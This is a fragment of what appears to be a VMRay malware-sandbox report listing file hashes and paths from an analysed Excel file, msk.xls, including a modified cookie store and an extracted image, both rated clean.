SHA256 07e2f7c011eab3663c90fbab1e3a39eaf2915684374ed79f8e89a48c2e9414ea Copy to Clipboard
SSDeep 384:0MqFgV6CurSmH0aKLPuJxRKMJIiplH1EQDJ5R8WXGZtvNH:0MqSV6CurSmHyLPuJxRRlFJ5R1XytVH Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\index.dat Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 32.00 KB
MD5 ba0beedb26c9a1dcbb30b1a63098b3e5 Copy to Clipboard
SHA1 a7e1994e6b7002394bcaaab228b98ca5d7ffd4c6 Copy to Clipboard
SHA256 0c5cceba5c416d5424387794429f89a2456b5326e2c7e5d8d2bd67f34bb616ec Copy to Clipboard
SSDeep 48:qGV+sobrV+sQ232Qbr2s29a2ptTQbrTAV+sobrV+sQ:qFsobosUQbKxFXQbnfsobos Copy to Clipboard
ImpHash -
image1.jpeg Extracted File Image
Clean
...
»
Parent File C:\Users\kEecfMwgj\Desktop\msk.xls
MIME Type image/jpeg
File Size 22.35 KB
MD5 948e28260308fe098cdfb42c046a0118 Copy to Clipboard
SHA1 4cfad060e65141e121ba8cb2f7fa4e0f40075825 Copy to Clipboard
SHA256 fa09ef1b83f77ac31aaaf81d02c0143e96066ecac209c4066ef6276f61ea7bc0 Copy to Clipboard
SSDeep 384:a149yjOIqaIwXSEBgli5LVwR6dZ9vvZh5KJ9WU8DUexcNkMEzOnWhMaDa54MTUVU:Y4EjOL/Agl8hznBv9KJ1+Uexc29OMW5x Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    

     Exit-Icon
    

    

     

      WHOIS Domain Information
     

     

      

       
        Domain Name
       
       
       
      

      

       
        WHOIS Response
       
       
        

       		
      

     

    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image